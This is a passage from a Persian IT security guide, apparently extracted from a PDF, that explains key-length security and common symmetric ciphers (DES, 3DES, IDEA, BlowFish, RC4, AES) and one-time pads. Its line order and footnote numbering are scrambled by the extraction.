‫ﻫﻢ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺍﺳﺖ‪.‬‬
‫ﺍﮔﺮ ﺗﻮﺍﻧﺎﻳﻲ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻳﻚ ﻣﻴﻠﻴﻮﻥ ﻛﻠﻴﺪ ﺭﻣﺰ ﺭﺍ ﺩﺭ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻤﺎﻡ ﻛﻠﻴﺪﻫﺎﻱ ‪ ۴۰‬ﺑﻴﺘـﻲ ﺭﺍ ﺩﺭ ﺗﻨﻬـﺎ ‪ ۱۳‬ﺭﻭﺯ‬
‫ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﻛﻠﻴﺪ ﺑﺎ ﻃﻮﻝ ‪ ۴۰‬ﺑﻴﺖ ﺑﻪ ﺍﻳﻦ ﺭﻭﺷﻨﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻧﮕﻪ ﺩﺍﺷﺘﻦ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺒﺎﺷﺪ‪ ،‬ﺑﺮﺍﻱ ﻛﻠﻴﺪ ﺍﻳﻤﻦ ﭼﻨـﺪ ﺑﻴـﺖ‬
‫ﻻﺯﻡ ﺍﺳﺖ؟ ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴﺪ ﻳﻚ ﻣﻴﻠﻴﺎﺭﺩ ﻛﻠﻴﺪ ﺭﺍ ﺩﺭ ﺛﺎﻧﻴﻪ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ ﺁﺯﻣﻮﺩﻥ ﻫﻤﺔ ﻛﻠﻴﺪﻫﺎﻱ ‪ ۸۰‬ﺑﻴﺘﻲ ﻫﻤﭽﻨﺎﻥ ﻣﺴﺘﻠﺰﻡ ‪ ۳۸‬ﻣﻴﻠﻴـﻮﻥ ﺳـﺎﻝ‬
‫ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺁﺯﻣﻮﺩﻥ ﻳﻚ ﻛﻠﻴﺪ ‪ ۱۲۸‬ﺑﻴﺘﻲ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺍﻣﺮﻭﺯﻱ ‪ ۱۰۲۲‬ﺳﺎﻝ ﻭ ﺣﺘﻲ ﺑﺎ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﻣﺤﺎﺳﺒﺎﺕ ﻛﻮﺍﻧﺘﻤﻲ ﺻﺪﻫﺎ ﻣﻴﻠﻴـﻮﻥ ﺳـﺎﻝ‬
‫ﻻ ﻇﺮﻑ ‪ ۴‬ﻣﻴﻠﻴﺎﺭﺩ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﻪ ﻳﻚ ﻏﻮﻝ ﻗﺮﻣﺰ ﺁﺳﻤﺎﻧﻲ ﺗﺒﺪﻳﻞ ﺷﻮﺩ ﻭ‬
‫ﻧﻴﺎﺯ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﺧﻮﺭﺷﻴﺪ ﻣﺎ ﺍﺣﺘﻤﺎ ﹰ‬
‫‪Binary Digits‬‬
‫‪81‬‬
‫‪٢٩٥‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺯﻣﻴﻦ ﺭﺍ ﻧﺎﺑﻮﺩ ﺧﻮﺍﻫﺪ ﻛﺮﺩ ‪ -‬ﻭ ﺑﺎ ﻓﺮﺽ ﺍﻳﻨﻜﻪ ﻫﻴﭽﮕﻮﻧﻪ ﺿﻌﻒ ﺩﻳﮕﺮﻱ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ‪ -‬ﻳـﻚ‬
‫ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ ۱۲۸‬ﺑﻴﺘﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﻏﻠﺐ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺎﻓﻲ ﺑﺎﺷﺪ!‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢﻫﺎﻱ ﺭﺍﻳﺞ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ‬
‫ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫‪٨٢‬‬
‫ﻼ ﺧﻼﺻﻪ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺯﻳﺎﺩﻱ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﺫﻳ ﹰ‬
‫‪DES‬‬
‫‪٨٣‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺩﻩ )‪ (DES‬ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۷۷‬ﻭ ﺑﺼﻮﺭﺕ ﻳﻚ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ‪ ANSI‬ﺩﺭ‬
‫ﺳﺎﻝ ‪ ۱۹۸۱‬ﺍﻧﺘﺨﺎﺏ ﺷﺪ‪ ،‬ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻠﻮﮐﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ‪ ۵۶‬ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﺑـﻪ ﭼـﻪ‬
‫ﻣﻨﻈﻮﺭﻱ ﺑﻜﺎﺭ ﺭﻭﺩ ﺩﺍﺭﺍﻱ ﭼﻨﺪ ﺣﺎﻟﺖ ﻋﻤﻠﻜﺮﺩﻱ ﻣﺨﺘﻠﻒ ﻣﻲﺑﺎﺷﺪ‪ DES .‬ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻗﻮﻱ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻃﻮﻝ ﻛﻠﻴﺪ ﻛﻮﺗﺎﻫﺶ ﻛﺎﺭﺑﺮﺩ ﺣﺎﻝ‬
‫ﺣﺎﺿﺮ ﺁﻧﺮﺍ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ ﺑـﺎ ﻫـﺪﻑ ﺍﺧﺘـﺼﺎﺻﻲ ﺷﻜـﺴﺘﻦ ﺭﻣـﺰ ‪ DES‬ﺗﻮﺳـﻂ ﺑﻨﻴـﺎﺩ ﻃﻼﻳـﻪﺩﺍﺭﺍﻥ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻚ )‪ ٨٤(EFF‬ﺑﺎ ﻫﺰﻳﻨﺔ ﻛﻤﺘﺮ ﺍﺯ ‪ ۲۵۰۰۰‬ﺩﻻﺭ ﺳﺎﺧﺘﻪ ﺷﺪ ﻭ ﺩﺭ ﻳﻚ ﻧﻤﺎﻳﺶ ﻋﻤﻮﻣﻲ‪ ،‬ﻛﻠﻴﺪ ﺭﻣـﺰ ﻳـﻚ ﭘﻴـﺎﻡ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ ﺩﺭ‬
‫ﻛﻤﺘﺮ ﺍﺯ ﻳﻚ ﺭﻭﺯ ﺩﺭ ﺑﺮﺍﺑﺮ ﭼﺸﻤﺎﻥ ﺍﻋﻀﺎﻱ ﺍﺋﺘﻼﻑ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﭘﻴﺪﺍ ﻛﺮﺩ‪.‬‬
‫‪ DES‬ﺳﻪﮔﺎﻧﻪ‬
‫‪٨٥‬‬
‫‪ DES‬ﺳﻪﮔﺎﻧﻪ ﺭﻭﺷﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺳﻪ ﺑﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ DES‬ﻭ ﺳﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻔﺎﻭﺕ ﻛﻪ ﺟﻤﻌﹰﺎ ﻃﻮﻝ ﻛﻠﻴﺪ ﺭﻣﺰ ﺭﺍ ﺑـﻪ‬
‫‪ ۱۶۸‬ﺑﻴﺖ ﻣﻲﺭﺳﺎﻧﺪ‪ DES ،‬ﺭﺍ ﺑﻄﻮﺭ ﭼﺸﻤﮕﻴﺮﻱ ﺍﻳﻤﻦﺗﺮ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻪ ﻫﻤﭽﻨـﻴﻦ ﺑـﻪ "‪ "3DES‬ﻣﻮﺳـﻮﻡ ﺍﺳـﺖ ﺩﺭ ﻣﻘﻴـﺎﺱ‬
‫ﻭﺳﻴﻌﻲ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻭ ﻧﻴﺰ ﺗﻮﺳﻂ ﭘﻮﺳﺘﺔ ﺍﻣﻦ )‪ ٨٦(SSH‬ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ‪ ،‬ﺩﻭﺑﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ DES‬ﺑﺎ ﺩﻭ ﻛﻠﻴﺪ‬
‫ﺭﻣﺰ ﻣﺘﻔﺎﻭﺕ‪ ،‬ﺑﺪﻟﻴﻞ ﻳﻚ ﺣﻤﻠﺔ ﻣﺘﻦﺳﺎﺩﺓ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﻣﻮﺳﻮﻡ ﺑﻪ ﺭﻭﻳﺎﺭﻭﻳﻲ ﺩﺭ ﻣﻴﺎﻥ‪ - ٨٧‬ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻬﺎﺟﻢ ﻫﻤﺰﻣـﺎﻥ ﻛﻮﺷـﺶ ﻣـﻲﻛﻨـﺪ‬
‫ﻣﺘﻦ ﻣﻌﻤﻮﻟﻲ ﺭﺍ ﺑﺎ ﻳﻚ ﻋﻤﻠﻴﺎﺕ ‪ DES‬ﻳﮕﺎﻧﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﻣﺘﻦ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺎ ﻳﻚ ﻋﻤﻠﻴﺎﺕ ‪ DES‬ﻳﮕﺎﻧـﺔ ﺩﻳﮕـﺮ ﺭﻣﺰﮔـﺸﺎﻳﻲ‬
‫ﻛﻨﺪ ﺗﺎ ﺩﺭ ﺁﻥ ﻣﻴﺎﻥ ﻳﻚ ﺗﻄﺎﺑﻖ ﭘﻴﺪﺍ ﺷﻮﺩ ‪ -‬ﺁﻧﻘﺪﺭ ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻭﺩ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻬﺒﻮﺩ ﻧﻤﻲﺑﺨﺸﺪ‪.‬‬
‫‪BlowFish‬‬
‫‪٨٨‬‬
‫‪IDEA‬‬
‫‪٨٩‬‬
‫‪٩٠‬‬
‫‪٩١‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺍﺩﻩ )‪ (IDEA‬ﺩﺭ ﺯﻭﺭﻳﺦ ﺳﻮﺋﻴﺲ ﺗﻮﺳﻂ ﺟﻴﻤﺰ ﺍﻝ ﻣﺎﺳﻲ ﻭ ﺯﻭﺟﻴﺎ ﻻﻱ ﭘﺪﻳـﺪ ﺁﻣﺪﻧـﺪ ﻭ ﺩﺭ ﺳـﺎﻝ‬
‫‪ ۱۹۹۰‬ﻋﻤﻮﻣﻲ ﺷﺪﻧﺪ‪ IDEA .‬ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ‪ ۱۲۸‬ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﻣﺸﻬﻮﺭ ‪ PGP‬ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻓﺎﻳﻠﻬـﺎ ﻭ ﻧﺎﻣـﻪﻫـﺎﻱ‬
‫‪۸۲‬‬
‫ﻓﻬﺮﺳﺖ ﻛﺎﻣﻠﺘﺮﻱ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺩﺭ ﺻﻔﺤﺎﺕ ‪ ۱۶۹‬ﺗﺎ ‪ ۱۷۶‬ﮐﺘﺎﺏ "‪ (PUIS) "Practical Unix & Internet Security‬ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﺁﻣﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪Data Encryption Standard‬‬
‫‪Electronic Frontier Foundation‬‬
‫‪Triple-DES‬‬
‫‪Secure Shell‬‬
‫‪Meet in the Middle‬‬
‫‪Bruce Schnier‬‬
‫‪International Data Encryption Algorithms‬‬
‫‪James L. Massey‬‬
‫‪Xuejia Lai‬‬
‫‪83‬‬
‫‪84‬‬
‫‪85‬‬
‫‪86‬‬
‫‪87‬‬
‫‪88‬‬
‫‪89‬‬
‫‪90‬‬
‫‪91‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫‪ BlowFish‬ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺑﻠﻮﻛﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺳﺮﻳﻊ‪ ،‬ﺟﻤﻊ ﻭ ﺟﻮﺭ‪ ،‬ﻭ ﺳﺎﺩﻩ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﺑﺮﻭﺱ ﺷـﻨﻴﺮ ﺍﺑـﺪﺍﻉ ﺷـﺪ‪ .‬ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺩﺍﺭﺍﻱ‬
‫ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ﺑﺎ ﻃﻮﻝ ﻣﺘﻐﻴﻴﺮ ﺍﺳﺖ ﻛﻪ ﺣﺪﺍﻛﺜﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺎ ‪ ۴۴۸‬ﺑﻴﺖ ﺑﺮﺳـﺪ‪ ،‬ﻭ ﺑـﺮﺍﻱ ﺍﺟـﺮﺍ ﺭﻭﻱ ﭘﺮﺩﺍﺯﺷـﮕﺮﻫﺎﻱ ‪ ۳۲‬ﺑﻴﺘـﻲ ﻭ ‪ ۶۴‬ﺑﻴﺘـﻲ‬
‫ﺑﻬﻴﻨﻪﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺯ ﺍﻧﺤﺼﺎﺭ ﺩﺭ ﺁﻣﺪﻩ ﻭ ﺩﺭ ﺣﻮﺯﺓ ﻣﺼﺮﻑ ﻫﻤﮕﺎﻧﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ‪ BlowFish .‬ﺩﺭ‬
‫ﭘﻮﺳﺘﺔ ﺍﻳﻤﻦ ﻭ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬
‫‪٢٩٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻴﺸﺘﺮ ﺍﺯ ‪ IDEA‬ﺗﻮﺳﻂ ﻳﻜﺴﺮﻱ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺍﻧﺤﺼﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ‬
‫ﺩﺭ ﺍﺧﺘﻴﺎﺭ ‪ Ascom–Tech AG‬ﺩﺭ ﺳﻮﻟﻮﺗﻮﺭﻥ ﺳﻮﺋﻴﺲ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻣﺤﺪﻭﺩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪RC4‬‬
‫‪٩٢‬‬
‫ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺮﻳﺎﻧﻲ ﺩﺭ ﺍﺑﺘﺪﺍ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ "ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎﻱ ‪ "RSA‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﺯ‬
‫ﻣﺤﺮﻣﺎﻧﻪ ﺗﺠﺎﺭﻱ ﻣﺨﻔﻲ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﺷﺪ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻢ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۴‬ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻛﺎﺭﺑﺮ ﮔﻤﻨﺎﻡ ‪ UseNet‬ﺍﻓﺸﺎ ﺷﺪ ﻭ ﺑﻨﻈﺮ ﻣﻲﺭﺳـﺪ ﻧـﺴﺒﺘﹰﺎ‬
‫ﻗﻮﻱ ﺑﺎﺷﺪ‪ RC4 .‬ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﺑﻴﻦ ‪ ۱‬ﺗﺎ ‪ ۲۰۴۸‬ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪(AES) Rijndael‬‬
‫ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻮﺳﻂ ﻳﻮﻫﺎﻥ ﺩﻳﻤﻦ‪ ٩٣‬ﻭ ﻭﻳﻨﺖ ﺭﻳﺠﻤﻦ‪ ٩٤‬ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺩﺭ ﻣﺎﻩ ﺍﻛﺘﺒﺮ ﺳﺎﻝ ‪ ۲۰۰۰‬ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻱ‬
‫)‪ ٩٥(NIST‬ﺑﻌﻨﻮﺍﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺟﺪﻳﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﺸﺮﻓﺘﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﮔﺰﻳﺪﻩ ﺷﺪ‪ Rijndeal .‬ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣـﺰﻱﺳـﺎﺯﻱ ﻓـﻮﻕﺍﻟﻌـﺎﺩﻩ‬
‫ﺳﺮﻳﻊ ﻭ ﺟﻤﻊ ﻭ ﺟﻮﺭ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﺑﻪ ﻃﻮﻝ ‪ ۱۲۸‬ﺗﺎ ‪ ۱۹۲‬ﻳﺎ ‪ ۲۵۶‬ﺑﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪.‬‬
‫ﺭﻣﺰﻧﮕﺎﺭﻫﺎ ﻗﺪﺭﺕ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺑﺎ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻣﻘﺎﻳﺴﻪﺍﻱ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻭﻗﺘﻲ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻣﻨﺘﺸﺮ ﻣﻲﺷـﻮﺩ‪ ،‬ﺳـﺎﻳﺮ ﺭﻣﺰﻧﮕﺎﺭﻫـﺎ‬
‫ﺑﺪﻧﺒﺎﻝ ﻧﻘﺎﻳﺺ ﻳﺎ ﺿﻌﻔﻬﺎﻱ ﺁﻥ ﻣﻲﮔﺮﺩﻧﺪ‪ .‬ﺑﻪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛﻨﻨﺪ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳـﺪ ﺍﺑـﺪﺍﻉ ﻛـﺮﺩﻩﺍﻧـﺪ ﺍﻋﺘﻤـﺎﺩ ﻧﻜﻨﻴـﺪ‪،‬‬
‫ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺭﻭﺵ ﻛﺎﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺁﺷﻜﺎﺭ ﻛﻨﻨﺪ ﺷﺎﻳﺪ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺍﻋﺘﺒﺎﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﻋﻤﻞ ﺩﻟﻴﻠﻲ ﺑﺮﺍﻱ ﻣﺨﻔﻴﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ ،‬ﭼﺮﺍﮐﻪ ﺍﻣﻨﻴﺖ ﻭﺍﻗﻌﻲ ﺩﺭ ﺷﻔﺎﻓﻴﺖ ﺍﺳﺖ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺭﻙ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﺍﻧﺘﺸﺎﺭ ﻳﺎﻓﺘﻦ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻳﺎ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺿﻤﺎﻧﺖ ﻧﻤﻲﻛﻨﺪ ﻛﻪ ﻧﻘـﺎﻳﺺ‬
‫ﺁﻥ ﻳﺎﻓﺘﻪ ﺧﻮﺍﻫﻨﺪ ﺷﺪ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ WEP‬ﻛﻪ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺷﺒﻜﻪﺳﺎﺯﻱ ‪ 802.11‬ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﺗﺎ ﭘـﻴﺶ ﺍﺯ ﺁﻧﻜـﻪ‬
‫ﻳﻚ ﻧﻘﺺ ﻣﻬﻢ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺁﻥ ﻳﺎﻓﺘﻪ ﺷﻮﺩ ﺳﺎﻟﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺷﺖ ‪ -‬ﻧﻘﺺ ﺩﺭ ﺗﻤﺎﻡ ﺁﻥ ﻣﺪﺕ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ‪ ،‬ﻭﻟﻲ ﻫـﻴﭽﻜﺲ ﺑـﻪ‬
‫ﺍﺷﻜﺎﻟﻲ ﺑﺮﺧﻮﺭﺩ ﻧﻜﺮﺩﻩ ﺑﻮﺩ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺑﺪﻧﺒﺎﻝ ﻳﻚ ﻧﻘﺺ ﺑﮕﺮﺩﺩ‪.‬‬
‫‪Pad‬ﻫﺎﻱ ﻳﻜﺒﺎﺭ ﻣﺼﺮﻑ‬
‫ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻛﻪ ﺛﺎﺑﺖ ﺷﺪﻩ ﻧﺎﺷﻜﺴﺘﻨﻲ ﺍﺳﺖ‪ ،‬ﺳﻴﺴﺘﻢ "‪ Pad‬ﻳﻜﺒﺎﺭ ﻣﺼﺮﻑ" ﺍﺳـﺖ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻧـﻮﻉ ﺍﻟﮕـﻮﺭﻳﺘﻢ‬
‫ﻃﺮﻓﻬﺎﻱ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪﻩ ﺍﺭﺗﺒﺎﻁ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﺸﻜﻞ ﺍﺯ ﻳﻚ ﺭﺷﺘﺔ ﻃﻮﻻﻧﻲ ﺍﺯ ﺑﺎﻳﺘﻬﺎﻱ ﺗﺼﺎﺩﻓﻲ )ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﭘﻴﺎﻣﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺍﺭﺳﺎﻝ ﺷـﻮﺩ(‬
‫ﺭﺍ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﻣﻲﮔﺬﺍﺭﻧﺪ‪ .‬ﺑﺎ ﺗﺒﺪﻳﻞ ﻫﺮ ﺑﺎﻳﺖ ﭘﻴﺎﻡ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺑﺎﻳﺖ ﻛﻠﻴﺪ‪ ،‬ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﺳﭙﺲ ﺁﻥ ﺑﺎﻳﺖ ﻛﻠﻴـﺪ‬
